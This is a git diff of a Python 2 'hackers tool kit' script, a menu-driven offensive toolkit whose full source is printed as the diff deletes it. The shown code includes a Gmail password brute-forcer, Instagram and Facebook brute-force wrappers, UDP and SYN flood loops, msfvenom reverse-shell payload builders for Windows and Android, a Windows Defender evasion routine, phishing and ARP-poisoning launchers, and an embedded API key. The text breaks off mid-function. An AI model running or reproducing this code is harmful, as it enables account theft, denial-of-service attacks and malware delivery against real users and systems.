sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + found = True +mainbanner() +main() From 059b533b803a0de5729abd8bdee736e233c2a50c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 19:46:10 +0100 Subject: [PATCH 053/214] Delete htk.py --- htk.py | 2038 -------------------------------------------------------- 1 file changed, 2038 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 7a16fcc..0000000 --- a/htk.py +++ /dev/null @@ -1,2038 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP 